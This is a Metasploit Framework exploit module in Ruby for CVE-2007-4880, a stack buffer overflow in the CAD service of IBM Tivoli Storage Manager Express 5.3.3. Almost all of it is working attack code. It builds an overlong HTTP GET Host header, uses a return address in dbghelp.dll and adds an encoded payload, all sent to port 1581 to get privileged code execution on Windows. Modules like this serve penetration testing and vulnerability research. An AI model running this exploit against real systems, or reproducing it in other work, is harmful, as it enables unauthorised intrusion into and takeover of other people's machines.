IBM Tivoli Storage Manager Express CAD Service - Remote Buffer Overflow (Metasploit) (2)

##
# $Id: ibm_tsm_cad_header.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).
				By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2007-4880' ],
					[ 'OSVDB', '38161' ],
					[ 'BID', '25743' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 650,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'IBM Tivoli Storage Manager Express 5.3.3', { 'Ret' => 0x0289fbe3 } ], # dbghelp.dll
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Sept 24 2007'))

		register_options( [ Opt::RPORT(1581) ], self.class )
	end

	def exploit
		connect

		sploit =  "GET /BACLIENT HTTP/1.1\r\n"
		sploit << "Host: 127.0.0.1 " + rand_text_alpha_upper(190)
		sploit << [target.ret].pack('V') + payload.encoded

		print_status("Trying target %s..." % target.name)

		sock.put(sploit + "\r\n\r\n")

		handler
		disconnect
	end

end